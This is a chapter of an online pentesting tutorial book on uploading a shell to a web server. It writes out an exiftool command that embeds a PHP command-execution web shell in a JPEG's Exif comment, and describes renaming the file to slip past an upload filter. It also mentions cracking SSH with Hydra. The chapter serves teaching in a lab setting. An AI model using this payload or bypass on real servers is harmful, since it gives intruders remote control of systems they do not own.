YOU ARE READING

Pentesting Tutorials

Non-Fiction

In this book, I will give you many easy guides to master your exploiting abilities. You will need Kali Linux for these tutorials. This is for educational purposes only.

#coding #computers #ethical #hacking #programming

Chapter VIII: Uploading a Shell to a Web Server and Getting Root Part 1

5K 2 2 
                                    

                                              
When we hack a web server, we usually want to be able to control it in order to download files or further exploit it. There are many websites that let you upload files such as avatar pictures that don't take the proper security measures. In this series, I will be showing you how to gain root access to such a web server.

                          
For part 1, we will be trying to upload a PHP file that allows us to control the system.

                          
Requirements

                          
We are going to need Nmap for this part of the tutorial. 

                          
Scan the Server:

                          
For this tutorial, I have setup a vulnerable server on my network. Let's scan it.

                          
Nmap found two open ports: 80 and 22, so we know that the server has both HTTP and SSH services. At this point, we could use Hydra to crack the root password on SSH, but that is not the point of this tutorial. Let's visit the webpage...  

                          
Upload Attempt:

                          
Let's view the upload page...

                          
The form tells us that the file must be either a .jpeg, a .jpg, or a .png file. But, just in case, we'll try to upload a malicious PHP file.

                          
Darn it. It doesn't upload. But what if we add our malicious code to the Exif data of a picture file?

                          
Backdooring an Image:

                          
In order to upload our shell, we need to use a legitimate picture file. In order to get our code to run, we need to add the PHP code to the Exif data. Enter this command:

                          
exiftool -Comment="<?php passthru(\$_GET'cmd'); _halt_compiler();" /root/picture.jpeg

                          
The \$_GET'cmd'); code is what reads our command, and the_halt_compiler(); prevents the file-checking system from reading on with the binary data.

                          
Now PHP code that let's us run commands is backdoored into the comments. Rename the file to picture.php.jpeg so that the website is forced to process the PHP code.

                          
Trying Again:

                          
Now, let's upload our backdoored file...

                          
Yes! It worked! Now we can use commands to control it with our web browser.

                          
Until next time...

                          
Now that we have control over the system, we will be looking for ways to upload our payload to the server next, and hopefully get an interactive shell.
Pentesting TutorialsWhere stories live. Discover now